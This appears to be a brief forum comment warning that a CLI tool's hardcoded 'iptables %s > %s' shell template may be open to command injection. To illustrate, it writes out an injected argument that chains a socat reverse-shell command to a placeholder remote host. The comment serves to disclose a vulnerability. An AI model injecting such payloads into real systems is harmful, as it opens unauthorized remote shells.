it looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.<p>For example<p><pre><code> iptables %s > %s 2>&1
</code></pre>
could probably be executed as<p><pre><code> iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
</code></pre>
by issuing<p><pre><code> iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
</code></pre>
and therefore it might be possible to get real shell access too.